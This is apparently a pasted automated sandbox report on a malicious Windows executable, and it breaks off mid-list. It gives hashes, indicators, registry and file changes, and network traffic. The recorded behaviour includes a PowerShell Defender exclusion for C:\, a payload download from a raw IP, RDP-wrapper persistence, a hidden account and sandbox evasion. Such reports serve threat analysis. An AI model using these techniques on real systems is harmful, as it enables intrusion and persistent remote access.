Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe"
- [*] File Size: 607744
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "3c9414c92e5a224b2b4b9185f46f81e619c82cc40eba94be25db6f7d663bc6de"
- [*] MD5: "bf0a5d345937b3fc53bc9ee45c8e22c9"
- [*] SHA1: "f99fa397c1946ce267bb16d1d48396074e20d277"
- [*] SHA512: "96020fe343500bde7fd74b72be555efc35d2ddf8d8b8534759c461ee221319358b267102ce92aec0691a7106f58f0e0c6efffbe09112c641f3ce5b62ba7efaa3"
- [*] CRC32: "2C5ADCDC"
- [*] SSDEEP: "12288:Z1MThUwpGV49lAPZrMdJAJx95FrWYe2n4x/3/Xml:HSKwpu4DAhrkuP5FrWYe2n4Z3/2"
- [*] Process Execution: [
- "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe",
- "powershell.exe",
- "images.exe",
- "powershell.exe",
- "cmd.exe",
- "services.exe",
- "svchost.exe",
- "svchost.exe",
- "svchost.exe",
- "lsm.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details": [
- {
- "IP": "5.206.225.104:80"
- },
- {
- "IP": "216.58.204.67:80"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Loads a driver",
- "Details": [
- {
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
- }
- ]
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: images.exe, pid: 2640, offset: 0x00000000, length: 0x00094600"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\ProgramData\\images.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://5.206.225.104/dll/upnp.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://5.206.225.104/dll/upnp.exe"
- }
- ]
- },
- {
- "Description": "Code injection with CreateRemoteThread in a remote process",
- "Details": [
- {
- "Injection": "images.exe(2640) -> cmd.exe(2880)"
- }
- ]
- },
- {
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details": [
- {
- "Process": "svchost.exe (2508)"
- }
- ]
- },
- {
- "Description": "Attempts to stop active services",
- "Details": [
- {
- "servicename": "UmRdpService"
- }
- ]
- },
- {
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details": [
- {
- "Process": "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe tried to sleep 1000 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "images.exe tried to sleep 4003 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 86885 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images"
- },
- {
- "data": "C:\\ProgramData\\images.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll"
- },
- {
- "data": "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP"
- }
- ]
- },
- {
- "Description": "Attempts to modify proxy settings",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\ProgramData\\images.exe"
- }
- ]
- },
- {
- "Description": "Collects information to fingerprint the system",
- "Details": []
- }
- ]
- [*] Started Service: [
- "TermService",
- "UmRdpService"
- ]
- [*] Executed Commands: [
- "powershell Add-MpPreference -ExclusionPath C:\\",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService",
- "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted"
- ]
- [*] Mutexes: [
- "Local\\_!MSFTHISTORY!_",
- "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
- "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
- "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
- "Local\\WininetStartupMutex",
- "Local\\WininetConnectionMutex",
- "Local\\WininetProxyRegistryMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "TSLicensingLock"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
- "C:\\ProgramData\\images.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\25-06-2019_01.13.22",
- "\\??\\PIPE\\samr",
- "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
- "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\014MXUFI059OALDHZTJQ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
- "C:\\rdpwrap.txt",
- "\\Device\\Termdd",
- "\\Device\\RdpDr",
- "\\??\\root#umbus#0000#{65a9a6cf-64cd-480b-843e-32c86e1ba19f}"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1428.7378156",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1428.7378156",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1428.7378156",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2728.7424765",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2728.7424765",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2728.7424765"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\inst",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\images_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileDirectory",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\Kwsogfk",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rudp",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rpdp",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\DisplayName",
- "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object"
- ]
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "google.be",
- "answers": [
- {
- "data": "216.58.204.67",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "ozcall.duckdns.org",
- "answers": [
- {
- "data": "213.208.152.199",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "216.58.206.131",
- "domain": "google.be"
- },
- {
- "ip": "213.208.152.199",
- "domain": "ozcall.duckdns.org"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://5.206.225.104/dll/upnp.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "5.206.225.104",
- "version": "1.1",
- "path": "/dll/upnp.exe",
- "data": "GET /dll/upnp.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 5.206.225.104\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FlushFileBuffers",
- "address": "0x43603c"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x436040"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x436044"
- },
- {
- "name": "HeapSize",
- "address": "0x436048"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x43604c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x436050"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x436054"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x436058"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x43605c"
- },
- {
- "name": "SetStdHandle",
- "address": "0x436060"
- },
- {
- "name": "CreateFileW",
- "address": "0x436064"
- },
- {
- "name": "AllocConsole",
- "address": "0x436068"
- },
- {
- "name": "GetGeoInfoA",
- "address": "0x43606c"
- },
- {
- "name": "K32EnumPageFilesW",
- "address": "0x436070"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x436074"
- },
- {
- "name": "Sleep",
- "address": "0x436078"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x43607c"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x436080"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x436084"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x436088"
- },
- {
- "name": "GetCPInfo",
- "address": "0x43608c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x436090"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x436094"
- },
- {
- "name": "FindNextFileA",
- "address": "0x436098"
- },
- {
- "name": "VirtualProtect",
- "address": "0x43609c"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x4360a0"
- },
- {
- "name": "FindFirstFileExA",
- "address": "0x4360a4"
- },
- {
- "name": "FindClose",
- "address": "0x4360a8"
- },
- {
- "name": "CloseHandle",
- "address": "0x4360ac"
- },
- {
- "name": "GetFileType",
- "address": "0x4360b0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x4360b4"
- },
- {
- "name": "HeapFree",
- "address": "0x4360b8"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4360bc"
- },
- {
- "name": "GetACP",
- "address": "0x4360c0"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x4360c4"
- },
- {
- "name": "ExitProcess",
- "address": "0x4360c8"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x4360cc"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4360d0"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4360d4"
- },
- {
- "name": "WriteFile",
- "address": "0x4360d8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4360dc"
- },
- {
- "name": "RaiseException",
- "address": "0x4360e0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x4360e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4360e8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x4360ec"
- },
- {
- "name": "TlsFree",
- "address": "0x4360f0"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4360f4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4360f8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4360fc"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x436100"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x436104"
- },
- {
- "name": "DecodePointer",
- "address": "0x436108"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x43610c"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x436110"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x436114"
- },
- {
- "name": "TerminateProcess",
- "address": "0x436118"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x43611c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x436120"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x436124"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x436128"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x43612c"
- },
- {
- "name": "InitializeSListHead",
- "address": "0x436130"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x436134"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x436138"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x43613c"
- },
- {
- "name": "RtlUnwind",
- "address": "0x436140"
- },
- {
- "name": "GetLastError",
- "address": "0x436144"
- },
- {
- "name": "SetLastError",
- "address": "0x436148"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x43614c"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x436150"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "FindWindowW",
- "address": "0x4361b4"
- },
- {
- "name": "GetTouchInputInfo",
- "address": "0x4361b8"
- },
- {
- "name": "DdeCmpStringHandles",
- "address": "0x4361bc"
- },
- {
- "name": "MessageBoxA",
- "address": "0x4361c0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x4361e4"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "DuplicateToken",
- "address": "0x436000"
- },
- {
- "name": "ObjectPrivilegeAuditAlarmA",
- "address": "0x436004"
- },
- {
- "name": "PerfDecrementULongCounterValue",
- "address": "0x436008"
- },
- {
- "name": "CredUnmarshalCredentialA",
- "address": "0x43600c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "VarBstrFromDate",
- "address": "0x436170"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "AVIStreamRelease",
- "address": "0x436014"
- }
- ],
- "dll": "AVIFIL32.dll"
- },
- {
- "imports": [
- {
- "name": "DeregisterManageableLogClient",
- "address": "0x4361f8"
- }
- ],
- "dll": "clfsw32.dll"
- },
- {
- "imports": [
- {
- "name": "ClusterNodeGetEnumCount",
- "address": "0x43601c"
- }
- ],
- "dll": "CLUSAPI.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_AddMasked",
- "address": "0x436024"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "UnDecorateSymbolNameW",
- "address": "0x436200"
- }
- ],
- "dll": "dbghelp.dll"
- },
- {
- "imports": [
- {
- "name": "DnsDhcpRegisterHostAddrs",
- "address": "0x43602c"
- }
- ],
- "dll": "DNSAPI.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436208"
- }
- ],
- "dll": "dsuiext.dll"
- },
- {
- "imports": [
- {
- "name": "GetMonitorContrast",
- "address": "0x436210"
- }
- ],
- "dll": "dxva2.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436218"
- },
- {
- "name": "GdipDisposeImageAttributes",
- "address": "0x43621c"
- },
- {
- "name": "GdipGetImageFlags",
- "address": "0x436220"
- },
- {
- "name": "GdipSetPathGradientPresetBlend",
- "address": "0x436224"
- }
- ],
- "dll": "gdiplus.dll"
- },
- {
- "imports": [
- {
- "name": "NotifyAddrChange",
- "address": "0x436034"
- }
- ],
- "dll": "IPHLPAPI.DLL"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436158"
- }
- ],
- "dll": "MAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "MprAdminInterfaceGetCredentials",
- "address": "0x436160"
- }
- ],
- "dll": "MPRAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DRMGetEnvironmentInfo",
- "address": "0x43622c"
- }
- ],
- "dll": "msdrm.dll"
- },
- {
- "imports": [
- {
- "name": "ICInfo",
- "address": "0x436168"
- }
- ],
- "dll": "MSVFW32.dll"
- },
- {
- "imports": [
- {
- "name": "glColor4sv",
- "address": "0x436178"
- }
- ],
- "dll": "OPENGL32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantToUInt32",
- "address": "0x436180"
- }
- ],
- "dll": "PROPSYS.dll"
- },
- {
- "imports": [
- {
- "name": "ResUtilSetResourceServiceEnvironment",
- "address": "0x436188"
- }
- ],
- "dll": "RESUTILS.dll"
- },
- {
- "imports": [
- {
- "name": "RpcServerListen",
- "address": "0x436190"
- },
- {
- "name": "NdrConformantStringMemorySize",
- "address": "0x436194"
- }
- ],
- "dll": "RPCRT4.dll"
- },
- {
- "imports": [
- {
- "name": "MgmDeleteGroupMembershipEntry",
- "address": "0x436234"
- }
- ],
- "dll": "rtm.dll"
- },
- {
- "imports": [
- {
- "name": "CM_Add_Range",
- "address": "0x43619c"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DllRegisterWindowClasses",
- "address": "0x4361a4"
- }
- ],
- "dll": "SHDOCVW.dll"
- },
- {
- "imports": [
- {
- "name": "lineGetAddressCaps",
- "address": "0x4361ac"
- }
- ],
- "dll": "TAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "WsCreateMessageForChannel",
- "address": "0x43623c"
- }
- ],
- "dll": "webservices.dll"
- },
- {
- "imports": [
- {
- "name": "WinBioControlUnit",
- "address": "0x436244"
- }
- ],
- "dll": "winbio.dll"
- },
- {
- "imports": [
- {
- "name": "IWICMetadataQueryReader_GetLocation_Proxy",
- "address": "0x4361ec"
- },
- {
- "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
- "address": "0x4361f0"
- }
- ],
- "dll": "WindowsCodecs.dll"
- },
- {
- "imports": [
- {
- "name": "WinHttpQueryOption",
- "address": "0x4361c8"
- }
- ],
- "dll": "WINHTTP.dll"
- },
- {
- "imports": [
- {
- "name": "FindNextUrlCacheContainerW",
- "address": "0x4361d0"
- },
- {
- "name": "InternetCheckConnectionA",
- "address": "0x4361d4"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutGetErrorTextW",
- "address": "0x4361dc"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x43624c"
- }
- ],
- "dll": "wsnmp32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x000a0d78",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0042685e",
- "timestamp": "2019-06-23 22:20:50",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00034800",
- "entropy": "6.32",
- "raw_address": "0x00000400",
- "virtual_size": "0x0003461b",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00036000",
- "size_of_data": "0x00008c00",
- "entropy": "5.45",
- "raw_address": "0x00034c00",
- "virtual_size": "0x00008bd6",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x0004ee00",
- "entropy": "6.08",
- "raw_address": "0x0003d800",
- "virtual_size": "0x0005045c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00090000",
- "size_of_data": "0x00000600",
- "entropy": "4.70",
- "raw_address": "0x0008c600",
- "virtual_size": "0x00000488",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00091000",
- "size_of_data": "0x00007a00",
- "entropy": "6.45",
- "raw_address": "0x0008cc00",
- "virtual_size": "0x0000799c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003dc34",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000002bc"
- },
- {
- "virtual_address": "0x00090000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000488"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00091000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x0000799c"
- },
- {
- "virtual_address": "0x0003d520",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x0000001c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d540",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000040"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00036000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000254"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "c8503ab5366fc6e13552bba734a2de16",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 34,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.LCMapStringEx",
- "advapi32.dll.EventActivityIdControl",
- "advapi32.dll.EventWriteTransfer",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
